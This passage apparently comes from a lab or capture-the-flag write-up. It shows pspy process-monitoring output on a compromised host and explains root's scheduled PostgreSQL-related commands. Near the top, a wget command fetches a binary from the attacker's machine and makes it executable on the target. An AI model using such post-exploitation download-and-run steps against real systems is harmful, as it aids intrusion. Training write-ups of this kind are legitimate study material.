PSPY
A root cronjob process was discovered
wesley@download:/dev/shm$ wget -q http://10.10.14.20/pspy64 ; chmod 755 ./pspy64Delivery complete
wesley@download:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
PostgreSQL
2023/08/09 15:16:06 CMD: UID=0 PID=36139 | /usr/sbin/sshd -D -R
2023/08/09 15:16:06 CMD: UID=112 PID=36142 | sshd: [net]
2023/08/09 15:16:06 CMD: UID=0 PID=36154 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36153 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36152 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36151 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36150 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36149 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36148 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36147 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36146 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36145 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36144 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36143 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/08/09 15:16:06 CMD: UID=0 PID=36157 | /bin/sh /etc/update-motd.d/00-header
2023/08/09 15:16:06 CMD: UID=0 PID=36156 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36155 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:06 CMD: UID=0 PID=36158 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36161 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36160 | uname -o
2023/08/09 15:16:06 CMD: UID=0 PID=36159 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36162 | /bin/sh /etc/update-motd.d/00-header
2023/08/09 15:16:06 CMD: UID=0 PID=36163 | /bin/sh /etc/update-motd.d/00-header
2023/08/09 15:16:06 CMD: UID=0 PID=36164 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:06 CMD: UID=0 PID=36165 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36166 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36171 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36170 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36169 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36168 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36167 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36173 | /bin/date
2023/08/09 15:16:06 CMD: UID=0 PID=36174 | /usr/bin/python3 /usr/bin/landscape-sysinfo
2023/08/09 15:16:07 CMD: UID=0 PID=36177 |
2023/08/09 15:16:07 CMD: UID=0 PID=36178 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:07 CMD: UID=0 PID=36180 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36179 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36182 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36181 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36183 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:07 CMD: UID=0 PID=36184 | /bin/sh /etc/update-motd.d/90-updates-available
2023/08/09 15:16:07 CMD: UID=0 PID=36185 |
2023/08/09 15:16:07 CMD: UID=0 PID=36187 | grep -q -m 1 .
2023/08/09 15:16:07 CMD: UID=0 PID=36186 |
2023/08/09 15:16:07 CMD: UID=0 PID=36188 | /bin/sh /usr/share/update-notifier/notify-updates-outdated
2023/08/09 15:16:07 CMD: UID=0 PID=36189 | gettext The list of available updates is more than a week old.
2023/08/09 15:16:07 CMD: UID=0 PID=36190 | gettext To check for new updates run: sudo apt update
2023/08/09 15:16:07 CMD: UID=0 PID=36191 | /bin/sh /etc/update-motd.d/91-contract-ua-esm-status
2023/08/09 15:16:07 CMD: UID=0 PID=36192 | /bin/sh /etc/update-motd.d/91-release-upgrade
2023/08/09 15:16:07 CMD: UID=0 PID=36195 | cut -d -f4
2023/08/09 15:16:07 CMD: UID=0 PID=36194 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd
2023/08/09 15:16:07 CMD: UID=0 PID=36193 | /bin/sh /etc/update-motd.d/91-release-upgrade
2023/08/09 15:16:07 CMD: UID=0 PID=36196 | id -u
2023/08/09 15:16:07 CMD: UID=0 PID=36201 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36202 | systemd-detect-virt -q -c
2023/08/09 15:16:07 CMD: UID=0 PID=36203 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36204 | apt-config shell StateDir Dir::State
2023/08/09 15:16:07 CMD: UID=0 PID=36205 | apt-config shell ListDir Dir::State::Lists
2023/08/09 15:16:07 CMD: UID=0 PID=36206 | apt-config shell ListDir Dir::State::Lists
2023/08/09 15:16:07 CMD: UID=0 PID=36207 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36208 | apt-config shell DpkgStatus Dir::State::status
2023/08/09 15:16:07 CMD: UID=0 PID=36209 |
2023/08/09 15:16:07 CMD: UID=0 PID=36211 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36212 | apt-config shell SourceList Dir::Etc::sourcelist
2023/08/09 15:16:07 CMD: UID=0 PID=36213 |
2023/08/09 15:16:07 CMD: UID=0 PID=36214 | id -u
2023/08/09 15:16:07 CMD: UID=0 PID=36216 | dirname /var/lib/update-notifier/hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36215 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36217 | cat /var/lib/update-notifier/hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36218 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36219 |
2023/08/09 15:16:07 CMD: UID=0 PID=36220 | /bin/sh /etc/update-motd.d/97-overlayroot
2023/08/09 15:16:07 CMD: UID=0 PID=36223 | /bin/sh /etc/update-motd.d/98-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36224 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36225 | stat -c %Y /var/lib/update-notifier/fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36226 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36227 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36228 | date +%s
2023/08/09 15:16:07 CMD: UID=0 PID=36229 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36230 | /bin/sh /etc/update-motd.d/98-reboot-required
2023/08/09 15:16:07 CMD: UID=0 PID=36231 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36233 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36235 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36234 |
2023/08/09 15:16:07 CMD: UID=0 PID=36236 | /bin/sh /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36237 | basename /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36239 |
2023/08/09 15:16:07 CMD: UID=0 PID=36238 | /bin/sh /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36240 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36241 | mesg n
2023/08/09 15:16:07 CMD: UID=0 PID=36242 | /bin/bash -i ./manage-db
2023/08/09 15:16:07 CMD: UID=0 PID=36243 | groups
2023/08/09 15:16:07 CMD: UID=0 PID=36244 | /bin/bash -i ./manage-db
2023/08/09 15:16:07 CMD: UID=0 PID=36245 | basename /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36246 | /bin/sh /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36247 | dirname /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36248 | dircolors -b
2023/08/09 15:16:07 CMD: UID=0 PID=36249 | systemctl status postgresql
2023/08/09 16:16:07 CMD: UID=0 PID=36250 | systemctl status download-site
2023/08/09 15:16:07 CMD: UID=0 PID=36251 | /bin/bash -i ./manage-db
2023/08/10 02:53:40 CMD: UID=0 PID=36252 | su -l postgres
2023/08/09 15:16:07 CMD: UID=113 PID=36253 | groups
2023/08/09 15:16:07 CMD: UID=113 PID=36254 | -bash
2023/08/09 15:16:07 CMD: UID=113 PID=36256 | -bash
2023/08/09 15:16:07 CMD: UID=113 PID=36255 | locale
2023/08/09 15:16:12 CMD: UID=113 PID=36257 | /usr/bin/perl /usr/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36258 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36260 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36259 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36261 | /lib64/ld-linux-x86-64.so.2 --verify /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36262 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36263 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36264 | /lib64/ld-linux-x86-64.so.2 /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36265 | /usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf Above commands are executed with an interval of 1 minute;
- The
rootuser logins to the host machine via SSHsystemctl status postgresqlandsystemctl status download-siteare called/bin/bash -i ./manage-dbis then executedsu -l postgresis then executed- A user with
UID=113, then gains a shell sessionUID=113then executes/usr/bin/perl /usr/bin/psql, to list out the shared library dependencies/lib64/ld-linux-x86-64.so.2 --verify /usr/lib/postgresql/12/bin/psql- the command is used to verify the compatibility and consistency of the PostgreSQL
psqlexecutable and its associated shared libraries using the dynamic linker/loader./lib64/ld-linux-x86-64.so.2: This is the dynamic linker/loader for 64-bit Linux systems. It is responsible for loading and linking shared libraries needed by executable files.--verify: This is an option provided to the dynamic linker/loader. It instructs the dynamic linker to verify the consistency and compatibility of a given executable and its associated libraries./usr/lib/postgresql/12/bin/psql: This is the path to thepsqlexecutable of PostgreSQL version 12.psqlis the interactive terminal for working with PostgreSQL databases.
- the command is used to verify the compatibility and consistency of the PostgreSQL
/lib64/ld-linux-x86-64.so.2 /usr/lib/postgresql/12/bin/psql^af8bf7- the dynamic linker/loader (
ld-linux-x86-64.so.2) is being used explicitly to execute thepsqlcommand. - In a typical scenario, you would execute the
psqlcommand directly without invoking the dynamic linker/loader. The dynamic linker/loader is responsible for loading and linking shared libraries needed by executable files. By directly invoking the dynamic linker/loader, you are essentially bypassing the normal execution process. While this command might work and launch thepsqlinteractive terminal, it’s unusual and not the recommended way to execute thepsqlcommand.
- the dynamic linker/loader (
/usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf- The command is used to start the PostgreSQL database server with specific configuration options. ^db6537
/usr/lib/postgresql/12/bin/postgres: This is the path to thepostgresexecutable of PostgreSQL version 12. It is the main executable for the PostgreSQL database server.-D /var/lib/postgresql/12/main: The-Doption specifies the data directory where PostgreSQL stores its data files and database content. In this case, the data directory is set to/var/lib/postgresql/12/main.-c config_file=/etc/postgresql/12/main/postgresql.conf: The-coption is used to set a configuration parameter for the PostgreSQL server. Here, theconfig_fileparameter is set to specify the location of the PostgreSQL configuration file (postgresql.conf). The configuration file for this command is located at/etc/postgresql/12/main/postgresql.conf.
- The command is used to start the PostgreSQL database server with specific configuration options. ^db6537
- A user with